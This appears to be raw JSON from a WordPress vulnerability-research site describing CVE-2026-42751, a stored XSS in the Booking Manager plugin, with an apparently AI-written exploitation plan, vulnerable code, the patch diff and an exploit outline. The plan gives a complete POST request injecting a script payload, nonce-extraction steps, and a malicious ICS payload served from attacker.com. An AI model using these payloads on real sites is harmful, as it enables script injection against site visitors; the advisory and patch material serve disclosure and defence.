[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9ttrDMBLP3N4zrwYjksr9wjfdhsLFYAZ6EislwESYQA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-42751","booking-manager-sync-wp-booking-calendar-import-events-export-bookings-to-ics-calendar-authenticated-subscriber-stored-c","Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar \u003C= 2.1.18 - Authenticated (Subscriber+) Stored Cross-Site Scripting","The Booking Manager – Sync WP Booking Calendar – Import Events, Export Bookings to ICS Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.1.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","booking-manager",null,"\u003C=2.1.18","2.1.19","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-29 00:00:00","2026-06-01 16:04:33",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0612c377-ec67-43b3-add0-5e9b0696eea1?source=api-prod",4,[22,23,24,25,26,27,28,29],"core\u002Fadmin\u002Fpage-settings-listing.php","core\u002Fadmin\u002Fpage-settings.php","core\u002Fany\u002Fcss\u002Fadmin-toolbar.css","core\u002Fany\u002Fjs\u002Fadmin-support.js","core\u002Fwpbm-functions.php","core\u002Fwpbm-ics-listing.php","index.php","readme.txt","researched",false,3,"# Exploitation Research Plan - CVE-2026-42751\n\n## 1. Vulnerability Summary\nThe **Booking Manager** plugin (up to 2.1.18) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability exists because the plugin fails to sanitize or escape the \"Listing Template\" setting stored in the database. Furthermore, it appears to allow users with **Subscriber** roles and above to access and modify these settings, or at least lacks a capability check during the update process. When the plugin renders events via the `[booking-manager-listing]` shortcode, it fetches this unescaped template from the options table and echoes it directly to the page.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Admin Page:** `wp-admin\u002Fadmin.php?page=oplugins` (Tab: `listing`)\n- **Vulnerable Parameter:** `wpbm_listing_template`\n- **Authentication:** Authenticated, Subscriber level or higher.\n- **Nonce Action:** `wpbm_settings_page_wpbm_form_listing`\n- **Sink:** The `wpbm_ics_get_listing_row()` function in `core\u002Fwpbm-ics-listing.php` fetches the option and returns it as part of the shortcode output without escaping.\n\n## 3. Code Flow\n1.  **Entry Point (Update):** In `core\u002Fadmin\u002Fpage-settings-listing.php`, the `content()` method handles form submission for the form name `wpbm_form_listing`.\n2.  **Processing:** If `$_POST['is_form_sbmitted_wpbm_form_listing']` is set, it calls `check_admin_referer( 'wpbm_settings_page_wpbm_form_listing' )` and then `$this->update()`.\n3.  **Storage:** The `update()` method (inherited\u002Finferred) saves the raw HTML from `$_POST['wpbm_listing_template']` into the WordPress option `wpbm_listing_template` via `update_option()`.\n4.  **Retrieval:** In `core\u002Fwpbm-ics-listing.php`, the function `wpbm_ics_get_listing_row($evnt)` calls `$row_template = get_wpbm_option( 'wpbm_listing_template' );`.\n5.  **Output (Sink):** The `$row_template` is used to build the `$listing_template` string, which is returned by the shortcode handler `wpbm_ics_get_listing()`. WordPress then echoes this string to the browser.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is generated on the admin settings page. Even if a Subscriber cannot see the menu item, the plugin's architecture might allow them to access the page directly if the capability check is weak (e.g., using `read` instead of `manage_options`).\n\n1.  **Identify Script Loading:** The settings page is located at `admin.php?page=oplugins`.\n2.  **Access Page:** Use `browser_navigate` as a Subscriber to `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=oplugins`.\n3.  **Extract Nonce:** The nonce is stored in a hidden input field within the form `wpbm_form_listing`.\n    - **JS Command:** `browser_eval(\"document.querySelector('input[name=_wpnonce]')?.value\")`\n    - **Alternative:** Check for localized objects if any (e.g., `wpbm_settings_listing`).\n\n## 5. Exploitation Strategy\n### Step 1: Inject Malicious Template\nSend a POST request to the admin dashboard to update the listing template.\n\n- **Tool:** `http_request`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=oplugins`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n```urlencoded\nis_form_sbmitted_wpbm_form_listing=1\n&_wpnonce=[EXTRACTED_NONCE]\n&_wp_http_referer=\u002Fwp-admin\u002Fadmin.php?page=oplugins\n&wpbm_listing_template=\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003Cdiv>[SUMMARY]\u003C\u002Fdiv>\n&submit=Save Changes\n```\n\n### Step 2: Trigger XSS\nView a page containing the shortcode.\n- **Shortcode:** `[booking-manager-listing url=\"https:\u002F\u002Fraw.githubusercontent.com\u002Fwpdevelop\u002Fbooking-manager\u002Fmaster\u002Ftest\u002Ftest.ics\"]` (or any valid .ics URL).\n- **Action:** Navigate to the page where this shortcode is placed.\n\n## 6. Test Data Setup\n1.  **Create User:** Create a Subscriber user.\n2.  **Create Page:** Create a public page with the shortcode:\n    - `wp post create --post_type=page --post_title=\"Calendar\" --post_status=publish --post_content='[booking-manager-listing url=\"https:\u002F\u002Fraw.githubusercontent.com\u002Fwpdevelop\u002Fbooking-manager\u002Fmaster\u002Ftest\u002Ftest.ics\"]'`\n3.  **Note:** The URL must be a valid ICS feed for the shortcode to process the \"row template\".\n\n## 7. Expected Results\n- The POST request should return a `302` redirect or a `200 OK` with a \"Settings Saved\" message.\n- Upon visiting the \"Calendar\" page, a JavaScript alert showing the document domain should appear.\n\n## 8. Verification Steps\n1.  **Check Option:** Verify the malicious payload is stored in the database.\n    - `wp option get wpbm_listing_template`\n2.  **Verify Frontend:** Use `browser_navigate` to the Calendar page and check for the alert or the injected `\u003Cscript>` tag in the source code.\n\n## 9. Alternative Approaches\n- **CSRF:** If the Subscriber cannot access the page to get a nonce, but the nonce check is absent or uses a predictable seed (unlikely), a CSRF attack against an Admin could be used.\n- **ICS Content XSS:** If the template itself is not injectable, test if the ICS feed fields (`SUMMARY`, `DESCRIPTION`) are escaped. If not, an attacker can host a malicious ICS file and point the shortcode `url` attribute to it.\n    - **Payload in ICS:** `SUMMARY:\u003Cscript>alert('XSS_FROM_ICS')\u003C\u002Fscript>`\n    - **Trigger:** `[booking-manager-listing url=\"http:\u002F\u002Fattacker.com\u002Fmalicious.ics\"]`","The Booking Manager plugin for WordPress is vulnerable to Authenticated Stored Cross-Site Scripting via the 'Event template' setting. This occurs because the plugin allows low-privileged users (Subscriber and above) to update global settings and fails to sanitize or escape the template content during storage or output.","\u002F\u002F core\u002Fadmin\u002Fpage-settings-listing.php (Lines 174-180 in v2.1.18)\n\u002F** Save Chanages *\u002F  \npublic function update() {\n        \n    \u002F\u002F We can  not use here such code:\n    \u002F\u002F WPBM_Settings_API::validate_textarea_post_static( 'listing_template' );\n    \u002F\u002F becuse its will  remove also JavaScript,  which  possible to  use for wizard form  or in some other cases.\n    $data_list_tmpl =  trim( stripslashes( $_POST['listing_template'] ) );\n    update_wpbm_option(   'wpbm_listing_template' , $data_list_tmpl );\n\n    wpbm_show_changes_saved_message();        \n}\n\n---\n\n\u002F\u002F core\u002Fwpbm-ics-listing.php (Lines 192-205 in v2.1.18)\nfunction wpbm_ics_get_listing_row( $evnt ) {\n\n    \u002F\u002F ... (omitted code)\n\n    \u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\n    \u002F\u002F Listing Template\n    \u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\u002F\t\t\n    $row_template = get_wpbm_option( 'wpbm_listing_template' );                 \n\t\n    \u002F\u002F Normilize\n    $replace_array = array();\n    foreach ( $evnt as $key => $value ) {\n        $key = str_replace( '_BOOKING_', '', $key );\n        if ( is_array( $value ) )\n            $value = implode( ',', $value );\n        $replace_array[ $key ] = $value;\n    }\n    \u002F\u002F ... (omitted code building $listing_template which is eventually echoed)","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-manager\u002F2.1.18\u002Fcore\u002Fadmin\u002Fpage-settings-listing.php\t2022-08-04 08:46:10.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fbooking-manager\u002F2.1.19\u002Fcore\u002Fadmin\u002Fpage-settings-listing.php\t2026-05-06 13:07:14.000000000 +0000\n@@ -68,29 +68,37 @@\n \n \t    \n     public function content() {\n-        \n+\n+\t\tif ( ! $this->can_manage_listing_template() ) {\n+\t\t\twp_die(\n+\t\t\t\t  esc_html__( 'Sorry, you are not allowed to manage the Booking Manager listing template.', 'booking-manager' )\n+\t\t\t\t, esc_html__( 'Forbidden', 'booking-manager' )\n+\t\t\t\t, array( 'response' => 403 )\n+\t\t\t);\n+\t\t}\n+\n         do_action( 'wpbm_hook_settings_page_header', array( 'page' => $this->in_page() ) );\t\t\t\t\t\t\t\t\u002F\u002F Define Notices Section and show some static messages, if needed.\n \n@@ -166,16 +174,36 @@\n \n-\n-    \u002F** Save Chanages *\u002F  \n+\n+    \u002F** Save Chanages *\u002F\n     public function update() {\n-            \n-\t\t\u002F\u002F We can  not use here such code:\n-\t\t\u002F\u002F WPBM_Settings_API::validate_textarea_post_static( 'listing_template' );\n-\t\t\u002F\u002F becuse its will  remove also JavaScript,  which  possible to  use for wizard form  or in some other cases.\n-\t\t$data_list_tmpl =  trim( stripslashes( $_POST['listing_template'] ) );\n+\n+\t\tif ( ! $this->can_manage_listing_template() ) {\n+\t\t\twp_die(\n+\t\t\t\t  esc_html__( 'Sorry, you are not allowed to manage the Booking Manager listing template.', 'booking-manager' )\n+\t\t\t\t, esc_html__( 'Forbidden', 'booking-manager' )\n+\t\t\t\t, array( 'response' => 403 )\n+\t\t\t);\n+\t\t}\n+\n+\t\t$data_list_tmpl = isset( $_POST['listing_template'] ) ? trim( wp_unslash( $_POST['listing_template'] ) ) : '';\n+\t\t$data_list_tmpl = wpbm_sanitize_listing_template( $data_list_tmpl );\n \t\tupdate_wpbm_option(   'wpbm_listing_template' , $data_list_tmpl );\n \n-\t\twpbm_show_changes_saved_message();        \n+\t\twpbm_show_changes_saved_message();\n     }\n \n+\n+\t\u002F**\n+\t * Listing template is a global frontend template, so managing it requires\n+\t * administrator-level options access rather than the general plugin menu role.\n+\t *\n+\t * @return bool\n+\t *\u002F\n+\tprivate function can_manage_listing_template() {\n+\n+\t\treturn current_user_can( 'manage_options' );\n+\t}","An authenticated attacker with Subscriber-level privileges or higher can bypass the intended access controls for the plugin's settings page. The attacker captures a valid security nonce from the 'listing' tab of the plugin settings (usually accessible at wp-admin\u002Fadmin.php?page=oplugins). They then send a POST request to the same endpoint with the parameter 'listing_template' containing a malicious JavaScript payload (e.g., \u003Cscript>alert(1)\u003C\u002Fscript>). Because the plugin lacks a 'manage_options' capability check on the update function and does not sanitize the input, the payload is saved as the 'wpbm_listing_template' option. When any user views a page containing the '[booking-manager-listing]' shortcode, the malicious script is rendered raw and executes in their browser.","gemini-3-flash-preview","2026-06-04 15:13:04","2026-06-04 15:14:11",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.1.18","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-manager\u002Ftags\u002F2.1.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-manager.2.1.18.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-manager\u002Ftags\u002F2.1.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbooking-manager.2.1.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbooking-manager\u002Ftags"]